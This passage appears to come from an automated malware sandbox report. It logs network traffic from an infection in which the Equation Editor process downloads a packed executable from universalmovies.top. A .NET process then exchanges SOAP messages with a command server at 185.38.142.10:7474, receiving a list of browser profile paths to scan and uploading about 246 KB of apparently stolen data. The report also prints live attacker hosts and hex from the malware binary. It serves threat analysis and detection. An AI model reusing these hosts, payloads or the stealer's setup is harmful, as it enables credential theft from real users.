                                                Jun 24, 2024 18:27:23.416912079 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.416920900 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.416939020 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.416946888 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.417042017 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.417051077 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.417093992 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.417103052 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.417110920 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.417221069 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.417229891 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.417238951 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.417248011 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.417256117 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.417264938 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.417306900 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.417315006 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.417323112 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.417330980 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.417337894 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.417416096 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.417424917 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.417433023 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.417440891 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.417448997 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.417457104 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.417537928 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.417546988 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.417555094 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.417562962 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.417567015 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.417581081 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.417588949 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.417635918 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.417644978 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.417651892 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.417660952 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.417669058 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.417676926 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.417691946 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.417700052 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.417752981 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.417762995 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.417771101 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.417778015 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.417793989 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.417802095 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.417831898 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.417840958 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.417892933 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.417902946 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.417911053 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.418078899 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.418088913 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.418097019 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.418121099 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.418129921 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.418175936 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.418184996 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.418217897 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.418263912 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.418272018 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.418318033 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.418397903 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.418452978 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.418462038 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.418826103 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.418836117 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.418843985 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.418852091 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.418860912 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.418869019 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.418876886 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.420802116 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.420814037 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.420830965 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.420840025 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.420855999 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.420865059 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.421555042 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.421744108 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.421753883 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.421812057 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.421822071 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.421838999 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.421848059 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.421911955 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.422046900 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.422055960 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.422064066 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.422125101 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.422208071 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.422290087 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.422298908 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.422363043 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.422370911 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.422475100 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.422483921 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.422607899 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.422657013 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.422667027 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.422709942 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.422741890 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.422827959 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.422837019 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.422885895 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.422930002 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.422940016 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:24.141536951 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:24.173197031 CEST491657474192.168.2.22185.38.142.10
                                                Jun 24, 2024 18:27:24.181166887 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:24.181274891 CEST491657474192.168.2.22185.38.142.10

                                                UDP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Jun 24, 2024 18:27:07.695571899 CEST5291753192.168.2.228.8.8.8
                                                Jun 24, 2024 18:27:07.702992916 CEST53529178.8.8.8192.168.2.22
                                                Jun 24, 2024 18:27:19.391134977 CEST6275153192.168.2.228.8.8.8
                                                Jun 24, 2024 18:27:19.409841061 CEST5789353192.168.2.228.8.8.8

                                                DNS Queries

                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                Jun 24, 2024 18:27:07.695571899 CEST192.168.2.228.8.8.80x9b31Standard query (0)universalmovies.topA (IP address)IN (0x0001)false
                                                Jun 24, 2024 18:27:19.391134977 CEST192.168.2.228.8.8.80xdf9bStandard query (0)api.ip.sbA (IP address)IN (0x0001)false
                                                Jun 24, 2024 18:27:19.409841061 CEST192.168.2.228.8.8.80x6d30Standard query (0)api.ip.sbA (IP address)IN (0x0001)false

                                                DNS Answers

                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                Jun 24, 2024 18:27:07.702992916 CEST8.8.8.8192.168.2.220x9b31No error (0)universalmovies.top172.67.162.95A (IP address)IN (0x0001)false
                                                Jun 24, 2024 18:27:07.702992916 CEST8.8.8.8192.168.2.220x9b31No error (0)universalmovies.top104.21.74.191A (IP address)IN (0x0001)false
                                                Jun 24, 2024 18:27:19.401240110 CEST8.8.8.8192.168.2.220xdf9bNo error (0)api.ip.sbapi.ip.sb.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                Jun 24, 2024 18:27:19.419294119 CEST8.8.8.8192.168.2.220x6d30No error (0)api.ip.sbapi.ip.sb.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false

                                                HTTP Request Dependency Graph

                                                • universalmovies.top
                                                • 185.38.142.10:7474

                                                HTTP Packets

                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                0192.168.2.2249163185.38.142.1074743116C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                TimestampBytes transferredDirectionData
                                                Jun 24, 2024 18:27:12.583518028 CEST239OUTPOST / HTTP/1.1
                                                Content-Type: text/xml; charset=utf-8
                                                SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                                Host: 185.38.142.10:7474
                                                Content-Length: 137
                                                Expect: 100-continue
                                                Accept-Encoding: gzip, deflate
                                                Connection: Keep-Alive
                                                Jun 24, 2024 18:27:13.259237051 CEST25INHTTP/1.1 100 Continue
                                                Jun 24, 2024 18:27:13.415976048 CEST359INHTTP/1.1 200 OK
                                                Content-Length: 212
                                                Content-Type: text/xml; charset=utf-8
                                                Server: Microsoft-HTTPAPI/2.0
                                                Date: Mon, 24 Jun 2024 16:27:13 GMT
                                                Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 74 72 75 65 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>
                                                Jun 24, 2024 18:27:18.433298111 CEST222OUTPOST / HTTP/1.1
                                                Content-Type: text/xml; charset=utf-8
                                                SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"
                                                Host: 185.38.142.10:7474
                                                Content-Length: 144
                                                Expect: 100-continue
                                                Accept-Encoding: gzip, deflate
                                                Jun 24, 2024 18:27:18.795423031 CEST25INHTTP/1.1 100 Continue
                                                Jun 24, 2024 18:27:19.327034950 CEST1236INHTTP/1.1 200 OK
                                                Content-Length: 4744
                                                Content-Type: text/xml; charset=utf-8
                                                Server: Microsoft-HTTPAPI/2.0
                                                Date: Mon, 24 Jun 2024 16:27:19 GMT
                                                Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 3e 3c 61 3a 42 6c 6f 63 6b 65 64 43 6f 75 6e 74 72 79 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 2f 3e 3c 61 3a 42 6c 6f 63 6b 65 64 49 50 20 78 6d 6c [TRUNCATED]
                                                Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><EnvironmentSettingsResponse xmlns="http://tempuri.org/"><EnvironmentSettingsResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:BlockedCountry xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:BlockedIP xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:Object4>true</a:Object4><a:Object6>false</a:Object6><a:ScanBrowsers>true</a:ScanBrowsers><a:ScanChromeBrowsersPaths xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>%USERPROFILE%\AppData\Local\Battle.net</b:string><b:string>%USERPROFILE%\AppData\Local\Chromium\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google(x86)\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Roaming\Opera Software\</b:string><b:string>%USERPROFILE%\AppData\Local\MapleStudio\ChromePlus\User Data</b:string [TRUNCATED]


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                1192.168.2.2249165185.38.142.1074743116C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                TimestampBytes transferredDirectionData
                                                Jun 24, 2024 18:27:22.061207056 CEST220OUTPOST / HTTP/1.1
                                                Content-Type: text/xml; charset=utf-8
                                                SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"
                                                Host: 185.38.142.10:7474
                                                Content-Length: 246270
                                                Expect: 100-continue
                                                Accept-Encoding: gzip, deflate
                                                Jun 24, 2024 18:27:23.395015001 CEST294INHTTP/1.1 200 OK
                                                Content-Length: 147
                                                Content-Type: text/xml; charset=utf-8
                                                Server: Microsoft-HTTPAPI/2.0
                                                Date: Mon, 24 Jun 2024 16:27:23 GMT
                                                Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 53 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 2f 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SetEnvironmentResponse xmlns="http://tempuri.org/"/></s:Body></s:Envelope>
                                                Jun 24, 2024 18:27:23.396502018 CEST216OUTPOST / HTTP/1.1
                                                Content-Type: text/xml; charset=utf-8
                                                SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
                                                Host: 185.38.142.10:7474
                                                Content-Length: 246262
                                                Expect: 100-continue
                                                Accept-Encoding: gzip, deflate
                                                Jun 24, 2024 18:27:24.141536951 CEST408INHTTP/1.1 200 OK
                                                Content-Length: 261
                                                Content-Type: text/xml; charset=utf-8
                                                Server: Microsoft-HTTPAPI/2.0
                                                Date: Mon, 24 Jun 2024 16:27:23 GMT
                                                Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 2f 3e 3c 2f 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>
                                                Jun 24, 2024 18:27:24.181166887 CEST408INHTTP/1.1 200 OK
                                                Content-Length: 261
                                                Content-Type: text/xml; charset=utf-8
                                                Server: Microsoft-HTTPAPI/2.0
                                                Date: Mon, 24 Jun 2024 16:27:23 GMT
                                                Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 2f 3e 3c 2f 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>


                                                HTTPS Proxied Packets

                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                0192.168.2.2249162172.67.162.954432728C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                TimestampBytes transferredDirectionData
                                                2024-06-24 16:27:08 UTC320OUTGET /ExtExport2.exe HTTP/1.1
                                                Accept: */*
                                                Accept-Encoding: gzip, deflate
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                Host: universalmovies.top
                                                Connection: Keep-Alive
                                                2024-06-24 16:27:08 UTC845INHTTP/1.1 200 OK
                                                Date: Mon, 24 Jun 2024 16:27:08 GMT
                                                Content-Type: application/octet-stream
                                                Content-Length: 644096
                                                Connection: close
                                                Last-Modified: Mon, 24 Jun 2024 07:55:16 GMT
                                                ETag: "66792664-9d400"
                                                Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                Cache-Control: max-age=315360000
                                                CF-Cache-Status: HIT
                                                Age: 27764
                                                Accept-Ranges: bytes
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Axg9amKknZN73B%2BpmIzJl8AytSfUvRUywELSOtsWTfgeU6gI6ijf0%2FK7SAUdo9qEHwqiAJPZqd14zaLi9%2FhrNAUnI3qTv1dpr5W0cDDjkFAJjOkVA6Vbt5bsG3XvR07J35IrkMfN"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                                X-Content-Type-Options: nosniff
                                                Server: cloudflare
                                                CF-RAY: 898e1561589a1a1f-EWR
                                                alt-svc: h3=":443"; ma=86400
                                                2024-06-24 16:27:08 UTC524INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 16 73 92 92 52 12 fc c1 52 12 fc c1 52 12 fc c1 14 43 1d c1 50 12 fc c1 cc b2 3b c1 53 12 fc c1 5f 40 23 c1 61 12 fc c1 5f 40 1c c1 e3 12 fc c1 5f 40 1d c1 67 12 fc c1 5b 6a 7f c1 5b 12 fc c1 5b 6a 6f c1 77 12 fc c1 52 12 fd c1 72 10 fc c1 e7 8c 16 c1 02 12 fc c1 e7 8c 23 c1 53 12 fc c1 5f 40 27 c1 53 12 fc c1 52 12 6b c1 53 12 fc c1 e7 8c 22 c1 53 12 fc c1 52 69 63 68 52 12 fc
                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$sRRRCP;S_@#a_@_@g[j[[jowRr#S_@'SRkS"SRichR
                                                2024-06-24 16:27:08 UTC1369INData Raw: 00 00 00 00 00 80 0c 00 00 10 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 e0 55 50 58 31 00 00 00 00 00 70 05 00 00 90 0c 00 00 64 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 00 70 04 00 00 00 12 00 00 6c 04 00 00 68 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                Data Ascii: UPX1pd@.rsrcplh@
                                                2024-06-24 16:27:08 UTC1369INData Raw: f0 ff 8e 74 07 37 60 0a 38 06 b7 ae dd 21 8b 00 90 f0 af 39 18 05 8b 39 a8 6e 47 0e 1a 00 ec 94 50 eb 86 50 f0 eb df 3c 5e 05 1f 13 10 cc f8 1a 80 90 e2 ee 37 12 db 43 c7 45 fc fe d5 89 5d f0 b1 5a 6b 5b dc 40 0c 88 1d 17 eb 6f 84 f0 42 53 0a fc 58 b4 eb db 04 f8 57 8f 39 5c 7e 34 fc 8d 86 83 17 18 76 01 8d 56 26 9e f7 d9 89 55 85 b7 fd 0a 7e 80 38 08 73 53 83 44 40 26 05 f0 f7 a4 03 c1 30 77 6c 37 c1 3b 46 da 1e 7c e2 8b 0e 3b d8 4c 2b c3 50 fe df ff 66 77 03 10 43 02 8d 04 c6 50 57 ed 24 8b 76 04 85 f6 75 8d bf 47 70 f0 d8 57 b1 e3 81 c1 99 c8 3b 87 d0 ee fe d9 74 20 2b cb 8d 83 7b 51 03 c6 7d b0 dc fe df 95 55 8d 99 f1 5c 8a 08 03 d8 80 f9 14 74 44 08 08 75 4c c3 8d 35 37 2e f8 83 f9 0c b9 20 71 ad 3e 85 61 56 02 18 40 04 bd 1e 2d 37 0d 05 74 fc 6c f0
                                                Data Ascii: t7`8!99nGPP<^7CE]Zk[@oBSXW9\~4vV&U~8sSD@&0wl7;F|;L+PfwCPW$vuGpW;t +{Q}U\tDuL57. q>aV@-7tl
